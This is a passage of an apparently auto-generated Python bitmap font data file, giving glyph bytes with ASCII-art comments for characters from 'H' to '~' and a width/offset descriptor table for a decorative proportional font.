0x00, 0x38, # OOO
0x00, 0x74, # OOO O
0x3C, 0x5C, # OOOO O OOO
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0xE0, # O OOO
0x1F, 0x20, # OOOOO O
0x10, 0x20, # O O
0x10, 0x20, # O O
0x10, 0x20, # O O
0x10, 0x14, # O O O
0x10, 0x38, # O OOO
0x10, 0x40, # O O
0x10, 0x00, # O
0x70, 0x00, # OOO
0xE0, 0x00, # OOO
0x60, 0x00, # OO
0x00, 0x00, #
0x00, 0x00, #
# @1320 'I' (5 pixels wide)
0x00, #
0x00, #
0xF0, # OOOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1342 'J' (8 pixels wide)
0x00, #
0x00, #
0x0F, # OOOO
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x72, # OOO O
0xCA, # OO O O
0xBA, # O OOO O
0xB4, # O OO O
0xC4, # OO O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1364 'K' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x01, 0x00, # O
0xF0, 0xC0, # OOOO OO
0x21, 0x00, # O O
0x21, 0x00, # O O
0x22, 0x00, # O O
0x24, 0x00, # O O
0x28, 0x00, # O O
0x38, 0x00, # OOO
0x28, 0x00, # O O
0x2C, 0x00, # O OO
0x26, 0x70, # O OO OOO
0x23, 0x70, # O OO OOO
0x20, 0xE0, # O OOO
0xF8, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1408 'L' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0xF8, 0x00, # OOOOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x21, 0x80, # O OO
0x21, 0xC0, # O OOO
0x21, 0xC0, # O OOO
0xF8, 0x40, # OOOOO O
0x07, 0x80, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1452 'M' (16 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x7C, 0x18, # OOOOO OO
0x88, 0x0E, # O O OOO
0xEC, 0x08, # OOO OO O
0x6C, 0x18, # OO OO OO
0x0A, 0x18, # O O OO
0x0A, 0x28, # O O O O
0x09, 0x28, # O O O O
0x09, 0x28, # O O O O
0x08, 0xC8, # O OO O
0x08, 0xC8, # O OO O
0x08, 0x4A, # O O O O
0x08, 0x0D, # O OO O
0x08, 0x0F, # O OOOO
0x3E, 0x09, # OOOOO O O
0x00, 0x06, # OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1496 'N' (16 pixels wide)
0x00, 0x00, #
0x00, 0x0F, # OOOO
0x38, 0x0F, # OOO OOOO
0x0C, 0x10, # OO O
0x0C, 0x10, # OO O
0x06, 0x10, # OO O
0x06, 0x10, # OO O
0x05, 0x10, # O O O
0x05, 0x10, # O O O
0x04, 0x90, # O O O
0x04, 0xD0, # O OO O
0x04, 0x50, # O O O
0x64, 0x70, # OO O OOO
0xEC, 0x30, # OOO OO OO
0x88, 0x30, # O O OO
0x78, 0x10, # OOOO O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1540 'O' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x33, 0xC0, # OO OOOO
0x24, 0x20, # O O O
0x4E, 0x10, # O OOO O
0x8E, 0x10, # O OOO O
0x84, 0x08, # O O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x40, 0x10, # O O
0x60, 0x20, # OO O
0x30, 0x40, # OO O
0x0F, 0x80, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1584 'P' (12 pixels wide)
0x08, 0x00, # O
0x08, 0x00, # O
0x3F, 0x00, # OOOOOO
0xC8, 0xC0, # OO O OO
0xA8, 0x20, # O O O O
0xE8, 0x10, # OOO O O
0x08, 0x10, # O O
0x08, 0x10, # O O
0x08, 0x20, # O O
0x0E, 0x40, # OOO O
0x0F, 0x80, # OOOOO
0x08, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x3F, 0x80, # OOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1628 'Q' (15 pixels wide)
0x00, 0x00, #
0x04, 0x00, # O
0x18, 0x00, # OO
0x27, 0xC0, # O OOOOO
0x48, 0x30, # O O OO
0x4B, 0x18, # O O OO OO
0x87, 0x08, # O OOO O
0x80, 0x04, # O O
0x80, 0x04, # O O
0x80, 0x04, # O O
0x80, 0x04, # O O
0xC0, 0x08, # OO O
0x47, 0x88, # O OOOO O
0x28, 0x50, # O O O O
0x10, 0x60, # O OO
0x0F, 0xEE, # OOOOOOO OOO
0x00, 0x3A, # OOO O
0x00, 0x22, # O O
0x00, 0x1C, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1672 'R' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x3F, 0x00, # OOOOOO
0xE1, 0x80, # OOO OO
0x20, 0x40, # O O
0x20, 0x40, # O O
0x20, 0x40, # O O
0x21, 0x80, # O OO
0x22, 0x00, # O O
0x2F, 0x00, # O OOOO
0x21, 0xC0, # O OOO
0x20, 0x40, # O O
0x20, 0x40, # O O
0x20, 0x40, # O O
0xF8, 0x40, # OOOOO O
0x00, 0x58, # O OO
0x00, 0x58, # O OO
0x00, 0x30, # OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1716 'S' (8 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0xC4, # OO O
0x94, # O O O
0x98, # O OO
0x40, # O
0x20, # O
0x1C, # OOO
0x02, # O
0x79, # OOOO O
0x89, # O O O
0xB1, # O OO O
0x82, # O O
0x46, # O OO
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1738 'T' (11 pixels wide)
0x00, 0xC0, # OO
0x01, 0xA0, # OO O
0x01, 0xA0, # OO O
0x00, 0x60, # OO
0x07, 0x80, # OOOO
0xFC, 0x00, # OOOOOO
0x84, 0x00, # O O
0x84, 0x00, # O O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x0F, 0x80, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1782 'U' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x71, 0x80, # OOO OO
0x22, 0x40, # O O O
0x43, 0xC0, # O OOOO
0x41, 0xA0, # O OO O
0x40, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x40, # O O
0x40, 0xC0, # O OO
0x21, 0x80, # O OO
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1826 'V' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0C, 0x1C, # OO OOO
0xF0, 0x22, # OOOO O O
0x10, 0x4C, # O O OO
0x18, 0x40, # OO O
0x08, 0x40, # O O
0x08, 0x40, # O O
0x04, 0x40, # O O
0x04, 0x40, # O O
0x04, 0x40, # O O
0x02, 0x40, # O O
0x02, 0x80, # O O
0x02, 0x80, # O O
0x03, 0x00, # OO
0x01, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1870 'W' (19 pixels wide)
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x3C, 0x00, 0xE0, # OOOO OOO
0xF0, 0x01, 0x60, # OOOO O OO
0x30, 0x01, 0xE0, # OO OOOO
0x18, 0x30, 0x20, # OO OO O
0x08, 0x30, 0x20, # O OO O
0x08, 0x50, 0x40, # O O O O
0x04, 0x50, 0x40, # O O O O
0x04, 0x58, 0x80, # O O OO O
0x04, 0x88, 0x80, # O O O O
0x02, 0x89, 0x00, # O O O O
0x02, 0x85, 0x00, # O O O O
0x02, 0x85, 0x00, # O O O O
0x01, 0x06, 0x00, # O OO
0x01, 0x02, 0x00, # O O
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
# @1936 'X' (13 pixels wide)
0x00, 0xC0, # OO
0x7C, 0x30, # OOOOO OO
0x10, 0x40, # O O
0x18, 0x40, # OO O
0x08, 0x80, # O O
0x0C, 0x80, # OO O
0x05, 0x00, # O O
0x07, 0x00, # OOO
0x02, 0x00, # O
0x03, 0x00, # OO
0x03, 0x00, # OO
0x04, 0x80, # O O
0xC4, 0x40, # OO O O
0xC8, 0x40, # OO O O
0x88, 0x38, # O O OOO
0x70, 0xC0, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1980 'Y' (15 pixels wide)
0x00, 0x00, #
0x70, 0x00, # OOO
0x88, 0x18, # O O OO
0xB4, 0x0E, # O OO O OOO
0xB4, 0x08, # O OO O O
0x62, 0x10, # OO O O
0x02, 0x20, # O O
0x02, 0x20, # O O
0x01, 0x20, # O O
0x01, 0x40, # O O
0x00, 0xC0, # OO
0x00, 0x80, # O
0x00, 0x80, # O
0x1D, 0x00, # OOO O
0x2D, 0x00, # O OO O
0x22, 0x00, # O O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2024 'Z' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x21, 0x00, # O O
0x3E, 0x80, # OOOOO O
0x20, 0x80, # O O
0x41, 0x00, # O O
0x01, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x04, 0x00, # O
0x08, 0x00, # O
0x10, 0xC0, # O OO
0x21, 0x40, # O O O
0x41, 0xC0, # O OOO
0x80, 0x80, # O O
0xFF, 0x00, # OOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2068 '[' (3 pixels wide)
0x00, #
0xE0, # OOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2090 '\' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x80, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x20, 0x00, # O
0x10, 0x00, # O
0x10, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x01, 0x00, # O
0x00, 0x80, # O
0x00, 0x80, # O
0x00, 0x40, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2134 ']' (3 pixels wide)
0x00, #
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2156 '^' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x0C, 0x00, # OO
0x0A, 0x00, # O O
0x12, 0x00, # O O
0x11, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2200 '_' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
# @2244 '`' (4 pixels wide)
0x00, #
0x00, #
0x80, # O
0x60, # OO
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2266 'a' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x4C, # O OO
0xB4, # O OO O
0xB4, # O OO O
0xE4, # OOO O
0x04, # O
0x08, # O
0x78, # OOOO
0x90, # O O
0xF0, # OOOO
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2288 'b' (9 pixels wide)
0x10, 0x00, # O
0x60, 0x00, # OO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x4E, 0x00, # O OOO
0x51, 0x00, # O O O
0x58, 0x80, # O OO O
0x58, 0x80, # O OO O
0x40, 0x80, # O O
0x41, 0x00, # O O
0xE3, 0x00, # OOO OO
0x3C, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2332 'c' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x1C, # OOO
0x62, # OO O
0x4E, # O OOO
0x8C, # O OO
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2354 'd' (7 pixels wide)
0x00, #
0x0E, # OOO
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x3C, # OOOO
0x4C, # O OO
0x84, # O O
0x84, # O O
0x9C, # O OOO
0x9C, # O OOO
0x4C, # O OO
0x34, # OO O
0x02, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2376 'e' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x62, # OO O
0xFC, # OOOOOO
0x80, # O
0x9C, # O OOO
0x9C, # O OOO
0x44, # O O
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2398 'f' (6 pixels wide)
0x00, #
0x38, # OOO
0x44, # O O
0x9C, # O OOO
0x98, # O OO
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x58, # O OO
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2420 'g' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x0E, # OOO
0x08, # O
0x38, # OOO
0x78, # OOOO
0xB4, # O OO O
0x84, # O O
0x84, # O O
0xC8, # OO O
0x70, # OOO
0x20, # O
0x27, # O OOO
0x79, # OOOO O
0xA1, # O O O
0x83, # O OO
0xC6, # OO OO
0x7C, # OOOOO
0x00, #
0x00, #
# @2442 'h' (9 pixels wide)
0x20, 0x00, # O
0xC0, 0x00, # OO
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x6E, 0x00, # OO OOO
0x33, 0x00, # OO OO
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x22, 0x00, # O O
0x23, 0x80, # O OOO
0x22, 0x80, # O O O
0xF3, 0x00, # OOOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2486 'i' (4 pixels wide)
0x00, #
0x00, #
0xE0, # OOO
0xE0, # OOO
0xE0, # OOO
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xF0, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2508 'j' (6 pixels wide)
0x00, #
0x0C, # OO
0x1C, # OOO
0x1C, # OOO
0x00, #
0x00, #
0x38, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x08, # O
0x78, # OOOO
0xB8, # O OOO
0x98, # O OO
0x70, # OOO
0x00, #
0x00, #
# @2530 'k' (10 pixels wide)
0x70, 0x00, # OOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x21, 0x00, # O O
0x21, 0xC0, # O OOO
0x22, 0x00, # O O
0x24, 0x00, # O O
0x38, 0x00, # OOO
0x30, 0x00, # OO
0x2C, 0x00, # O OO
0x25, 0xC0, # O O OOO
0x24, 0x40, # O O O
0xF7, 0x80, # OOOO OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2574 'l' (4 pixels wide)
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0xB0, # O OO
0xB0, # O OO
0x90, # O O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2596 'm' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xC0, 0xE0, # OO OOO
0x5D, 0x10, # O OOO O O
0x66, 0x08, # OO OO O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x4C, 0x68, # O OO OO O
0x4C, 0x70, # O OO OOO
0xE0, 0x60, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2640 'n' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x40, 0x00, # O
0xCE, 0x00, # OO OOO
0x51, 0x00, # O O O
0x60, 0x80, # OO O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x4D, 0x00, # O OO O
0x49, 0x00, # O O O
0xE6, 0x00, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2684 'o' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x1C, # OOO
0x7A, # OOOO O
0x59, # O OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x66, # OO OO
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2706 'p' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x30, 0x00, # OO
0x56, 0x00, # O O OO
0x3D, 0x00, # OOOO O
0x2C, 0x80, # O OO O
0x20, 0x80, # O O
0x20, 0x80, # O O
0x20, 0x80, # O O
0x31, 0x00, # OO O
0x2E, 0x00, # O OOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0xF0, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
# @2750 'q' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0xC0, # OO
0x1E, 0x80, # OOOO O
0x22, 0x80, # O O O
0x41, 0x80, # O OO
0x81, 0x80, # O OO
0x99, 0x80, # O OO OO
0x9D, 0x00, # O OOO O
0x85, 0x00, # O O O
0x4D, 0x00, # O OO O
0x39, 0x00, # OOO O
0x01, 0x00, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
# @2794 'r' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x27, 0x00, # O OOO
0x28, 0x80, # O O O
0x7E, 0x80, # OOOOOO O
0x2F, 0x00, # O OOOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x28, 0x00, # O O
0xF0, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2838 's' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x70, # OOO
0xA8, # O O O
0xB8, # O OOO
0x80, # O
0x40, # O
0x20, # O
0x10, # O
0x08, # O
0x68, # OO O
0x48, # O O
0x70, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2860 't' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x20, # O
0x20, # O
0x3C, # OOOO
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x3C, # OOOO
0x3C, # OOOO
0x24, # O O
0x18, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2882 'u' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x67, # OO OOO
0xE2, # OOO O
0xE2, # OOO O
0x42, # O O
0x42, # O O
0x82, # O O
0x82, # O O
0x82, # O O
0x46, # O OO
0x3A, # OOO O
0x03, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2904 'v' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x03, 0x00, # OO
0x27, 0x80, # O OOOO
0xC5, 0x80, # OO O OO
0x26, 0x80, # O OO O
0x20, 0x80, # O O
0x10, 0x80, # O O
0x11, 0x00, # O O
0x09, 0x00, # O O
0x0A, 0x00, # O O
0x0A, 0x00, # O O
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2948 'w' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x04, # O
0x21, 0xCA, # O OOO O O
0x70, 0x8E, # OOO O OOO
0xB0, 0x82, # O OO O O
0x11, 0x42, # O O O O
0x11, 0x44, # O O O O
0x09, 0x44, # O O O O
0x0A, 0x28, # O O O O
0x0A, 0x28, # O O O O
0x0C, 0x10, # OO O
0x04, 0x10, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2992 'x' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x27, 0x00, # O OOO
0x62, 0x00, # OO O
0x32, 0x00, # OO O
0x14, 0x00, # O O
0x18, 0x00, # OO
0x18, 0x00, # OO
0x28, 0x00, # O O
0x4B, 0x80, # O O OOO
0xC7, 0x80, # OO OOOO
0x63, 0x00, # OO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @3036 'y' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x07, # OOO
0x45, # O O O
0xE1, # OOO O
0x21, # O O
0x32, # OO O
0x12, # O O
0x14, # O O
0x14, # O O
0x08, # O
0x08, # O
0x10, # O
0x70, # OOO
0xA0, # O O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
# @3058 'z' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x70, # OOO
0x71, # OOO O
0x3F, # OOOOOO
0x02, # O
0x02, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x41, # O O
0xFE, # OOOOOOO
0x86, # O OO
0x02, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @3080 '{' (6 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xC0, # OO
0x20, # O
0x20, # O
0x60, # OO
0x40, # O
0x40, # O
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @3102 '|' (1 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @3124 '}' (5 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x90, # O O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x18, # OO
0x20, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @3146 '~' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x38, 0x20, # OOO O
0x4C, 0x20, # O OO O
0x86, 0x40, # O OO O
0x83, 0x80, # O OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @3190 '°' (4 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x90, # O O
0x90, # O O
0x60, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
)
descriptors = (
(3,0),# !
(3,22),# "
(9,44),# #
(6,88),# $
(10,110),# %
(13,154),# &
(1,198),# '
(4,220),# (
(4,242),# )
(7,264),# *
(11,286),# +
(2,330),# ,
(5,352),# -
(1,374),# .
(9,396),# /
(9,440),# 0
(8,484),# 1
(8,506),# 2
(7,528),# 3
(10,550),# 4
(9,594),# 5
(9,638),# 6
(7,682),# 7
(7,704),# 8
(8,726),# 9
(2,748),# :
(2,770),# ;
(12,792),# <
(11,836),# =
(12,880),# >
(7,924),# ?
(10,946),# @
(14,990),# A
(10,1034),# B
(10,1078),# C
(13,1122),# D
(9,1166),# E
(7,1210),# F
(13,1232),# G
(14,1276),# H
(5,1320),# I
(8,1342),# J
(12,1364),# K
(10,1408),# L
(16,1452),# M
(16,1496),# N
(13,1540),# O
(12,1584),# P
(15,1628),# Q
(13,1672),# R
(8,1716),# S
(11,1738),# T
(11,1782),# U
(15,1826),# V
(19,1870),# W
(13,1936),# X
(15,1980),# Y
(10,2024),# Z
(3,2068),# [
(10,2090),# \
(3,2134),# ]
(10,2156),# ^
(11,2200),# _
(4,2244),# `
(6,2266),# a
(9,2288),# b
(7,2332),# c
(7,2354),# d
(7,2376),# e
(6,2398),# f
(8,2420),# g
(9,2442),# h
(4,2486),# i
(6,2508),# j
(10,2530),# k
(4,2574),# l
(13,2596),# m
(9,2640),# n
(8,2684),# o
(9,2706),# p
(10,2750),# q
(9,2794),# r
(5,2838),# s
(6,2860),# t
(8,2882),# u
(9,2904),# v
(15,2948),# w
(9,2992),# x
(8,3036),# y
(8,3058),# z
(6,3080),# {
(1,3102),# |
(5,3124),# }
(11,3146),# ~
(4,3190),# °
)
kerning = (
